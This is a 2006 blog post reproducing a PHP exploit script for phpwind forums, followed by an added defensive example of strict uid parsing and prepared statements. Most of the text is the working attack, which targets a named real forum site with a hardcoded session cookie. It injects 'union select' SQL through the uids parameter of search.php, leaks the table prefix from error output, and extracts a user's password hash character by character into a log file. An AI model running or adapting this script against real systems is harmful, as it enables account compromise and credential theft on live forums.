phpwind 0day code found online


Posted in PHP on December 07, 2006

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Codz By 剑心</title>
<style type="text/css">
body,td {
font-family: "Tahoma";
font-size: "12px";
line-height: "150%";
}
.smlfont {
font-family: "Tahoma";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {
COLOR: "#A60000";
}
a:link,a:visited,a:active {
color: "#000000";
text-decoration: underline;
}
a:hover {
color: "#465584";
text-decoration: none;
}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
<center>The Exploit Of The All Phpwind Version</center>
<center> BY 剑心</center>
<br>
<br>
<br>
<br>
<br>

<?php
ini_set("max_execution_time",0);
error_reporting(7);

$path="/search.php";
$server='bbs.ccidnet.com';
$cookie='lastfid=0; ol_offset=27160; ipstate=1160671066; ipfrom=7641b3edc60a722a72f5a76e55ce6e97%09%B1%B1%BE%A9%CA%D0%B7%BD%D5%FD%BF%ED%B4%F8%0D; lastvisit=0%091161077981%09%2Fsearch.php%3F; auth=3435393735327c313136313037363538383230367c327c6261646567677c31303030303030303030303030303030; PHPSESSID=3b11a9ca33071f0b06c9aab0995918a7; cknum=BlJQUwZSVgtXAz9sBFEAWgtdU1NXUANSWAEFDFNQVVYDUA1QB1tTUQAHVAE%3D';

$useragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)";

$uid=2;
$_GET['uid']&&$uid=$_GET['uid'];
$tid=539264;

$mask='没有查找匹配的内容';
$count=0;

//$testing=1;
//$testing=$_GET['test'];
if($testing) {preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send(""),$php);echo$php[1];die();}

//$debug=1;

$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1".$sql."/*j&184288238=kkkk&276791066=jjjjjj";
$response=send($cmd);

preg_match('/FROM (.+)threads/ie',$response,$match);

$pre=$match[1];
if ($match[1]) echo 'Good Job!Wo Got The pre: <font color=red>'.$match[1]."</font><br>";
else if (strpos($response,'value="登 录"')) die("You Are Not Login!Try to get anthor Cookie and Useragen value!<br>");
else {echo "Maybe It is not vul!<br>";die();}

echo "Try to Get the uid=$uid 's Password:<font color=red>";
$log=fopen('log.txt','a+');

for($i=0;$i<16;$i++)
{

$type=0;
$sub=$i+9;
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >47 and ord(mid(password,$sub,1))<58";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=0;
for($m=48;$m<=57;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1)) >96 and ord(mid(password,$sub,1))<123";
$sql=urlencode($sql);
$temp=md5(rand(1,10000)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {

$type=1;
for($m=97;$m<=122;$m++){
$temp=md5(rand(1,100)+microtime());
$sql=" union select $tid from ".$pre."members where uid=$uid and ord(mid(password,$sub,1))=$m";
$sql=urlencode($sql);
$temp=md5(rand(1,100)+microtime());
$cmd="step=3&pwuser=".$temp."loveshell"."&uids=-1)".$sql."/*.&184288238=kkkk&276791066=jjjjjj";
if(!strpos(send($cmd),$mask)) {
echo chr($m);
fputs($log,chr($m));
break;
}
continue;
}
continue;
}

echo "error!<br>";
die("Shit!May be the data you post is Not valid!Try anthor UID\r\n");

}
fclose($log);
echo "<br>Done!We Post $count times!<br>";

function send($cmd)
{
global $path,$server,$cookie,$count,$useragent,$debug;

$count=$count+1;
$message = "POST ".$path."? HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";

$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
return $resp;
}
?>
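Added example, not part of the original script and not phpwind's own code: the requests above send `uids=-1)` followed by `union select ...` and a `/*` comment, which only works if the `uids` value is placed inside a parenthesised SQL list without validation. One way to handle such a parameter on the server side, assuming a PDO connection, a table prefix `pw_` and a threads table with `tid` and `authorid` columns (all three are assumptions for illustration):

```php
<?php
// Added example (not phpwind's code). Assumed for illustration: a PDO handle,
// the table prefix "pw_", and a threads table with tid / authorid columns.

/**
 * Strictly parse a comma-separated uid list.
 * Returns an array of unique ints, or null if any element is not a
 * plain decimal number (so the whole request can be refused).
 */
function parse_uid_list(string $raw, int $max = 100): ?array
{
    $ids = [];
    foreach (explode(',', $raw) as $part) {
        // ctype_digit() is false for '', signs, spaces, ')' and SQL keywords;
        // the 9-digit limit keeps the value inside a 32-bit signed int.
        if (!ctype_digit($part) || strlen($part) > 9) {
            return null;
        }
        $ids[(int)$part] = true;          // key on the int to de-duplicate
    }
    return count($ids) <= $max ? array_keys($ids) : null;
}

/** Look up thread ids by author, binding every uid as a parameter. */
function find_threads_by_authors(PDO $db, string $rawUids): array
{
    $uids = parse_uid_list($rawUids);
    if ($uids === null) {
        // Record the rejection for detection; do not echo anything SQL-related.
        error_log('search: rejected malformed uids parameter');
        return [];
    }
    $marks = implode(',', array_fill(0, count($uids), '?'));
    $stmt  = $db->prepare("SELECT tid FROM pw_threads WHERE authorid IN ($marks)");
    $stmt->execute($uids);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a well-formed list, then the shape of the value
// the script above sends in the uids field.
var_dump(parse_uid_list('2,15,2'));
var_dump(parse_uid_list('-1) union select 1/*'));
```

The script's first request also depends on the SQL error text (`FROM <prefix>threads`) being returned in the response to learn the table prefix; with `display_errors` off and database errors written only to the server log, that text does not reach the client.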
